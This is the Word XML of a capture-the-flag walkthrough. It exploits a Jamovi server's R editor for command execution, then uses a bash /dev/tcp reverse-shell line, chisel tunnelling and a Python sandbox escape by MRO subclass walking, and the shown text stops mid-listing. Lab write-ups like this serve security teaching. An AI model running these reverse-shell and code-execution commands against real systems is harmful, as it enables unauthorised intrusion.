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w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">EDITOR</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine. If you require support, please open a ticket in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">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jfgkobo3hzc"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know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bat3hs5ulclm" w:id="5"/>
      <w:bookmarkEnd w:id="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4305300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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r6da45oq505u" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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22 - SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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80 - HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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111 - RCPBIND</w:t>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accessing the website, we are automatically redirected to port 41337, which is running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jamovi</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5130800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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59436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Jamovi </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a new “3rd generation” statistical spreadsheet. Designed from the ground up to be easy to use, jamovi is an attractive alternative to expensive statistical products such as SPSS and SAS.</w:t>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Jamovi was developed based on the R statistical language.</w:t>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Looking at the site, I see that it has an editor → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rj editor</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5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="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5562600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="75"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594360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5359400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rj is a new module for the jamovi statistical spreadsheet that allows you to use the R programming language to analyze data from within jamovi. Although jamovi is already built on R and all the analyses it provides are written in R, until now it was not possible to insert R code directly. Rj changes that.</w:t>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Knowing this, we can execute system commands through the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> language.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.rdocumentation.org/packages/base/versions/3.6.2/topics/system</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">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try(system("ls /", intern = TRUE, ignore.stderr = TRUE))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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000500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76"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have RCE on the server. Now let’s get a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.revshells.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">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try(system("/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/IP/4444 0&gt;&amp;1'", intern = TRUE, ignore.stderr = TRUE))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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I will use Netcat to listen on a port to receive our reverse connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">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color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1955800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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292600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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943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receive the reverse shell connection 😀 — we are inside a container.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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03400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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have our first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">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124200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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jji850pj9zq5" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Escape python sandbox 😀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">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We have a file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server.py</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in the root directory → </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02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962400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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perform port forwarding and interact with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">from our machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/jpillora/chisel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tunneling with Chisel and SSF</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[Update 2020-08-10] Chisel now has a built-in SOCKS proxy! I also added a cheat sheet since I reference this post too often. [Original] Having just written up HTB Reddish, pivoting without SSH was at the top of my mind, and I've since learned of two programs that enable pivots, Chisel and Secure Socket Funneling (SSF).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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downloading chisel on my machine, I will send it to the server where we have a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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87600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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16100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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73300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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28800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="77"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From now on, we can interact with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from our local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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57400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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To escape the sandbox, I will use an SSTI technique. Remember that we cannot use (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">__import__ , ' |  ' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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and we must always start using the key, in this case → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"private"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 😅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Let’s go. The variable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">private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is an object of the string class.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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36700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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Therefore, it is an object and has functions. Through the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Method Resolution Order (MRO)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, I can individually access each of these objects.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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01800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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16100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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Inside this class, I can access all subclasses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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25600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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[&lt;type 'type'&gt;, &lt;type 'weakref'&gt;, &lt;type 'weakcallableproxy'&gt;, &lt;type 'weakproxy'&gt;, &lt;type 'int'&gt;, &lt;type 'basestring'&gt;,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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&lt;type 'bytearray'&gt;, &lt;type 'list'&gt;, &lt;type 'NoneType'&gt;, &lt;type 'NotImplementedType'&gt;, &lt;type 'traceback'&gt;, &lt;type 'super'&gt;,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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&lt;type 'xrange'&gt;, &lt;type 'dict'&gt;, &lt;type 'set'&gt;, &lt;type 'slice'&gt;, &lt;type 'staticmethod'&gt;, &lt;type 'complex'&gt;, &lt;type 'float'&gt;,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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&lt;type 'buffer'&gt;, &lt;type 'long'&gt;, &lt;type 'frozenset'&gt;, &lt;type 'property'&gt;, &lt;type 'memoryview'&gt;, &lt;type 'tuple'&gt;, &lt;type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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'enumerate'&gt;, &lt;type 'reversed'&gt;, &lt;type 'code'&gt;, &lt;type 'frame'&gt;, &lt;type 'builtin_function_or_method'&gt;, &lt;type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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'instancemethod'&gt;, &lt;type 'function'&gt;, &lt;type 'classobj'&gt;, &lt;type 'dictproxy'&gt;, &lt;type 'generator'&gt;, &lt;type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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'getset_descriptor'&gt;, &lt;type 'wrapper_descriptor'&gt;, &lt;type 'instance'&gt;, &lt;type 'ellipsis'&gt;, &lt;type 'member_descriptor'&gt;,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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&lt;type 'file'&gt;, &lt;type 'PyCapsule'&gt;, &lt;type 'cell'&gt;, &lt;type 'callable-iterator'&gt;, &lt;type 'iterator'&gt;, &lt;type 'sys.long_info'&gt;,</w:t>
      </w:r>
    </w:p>
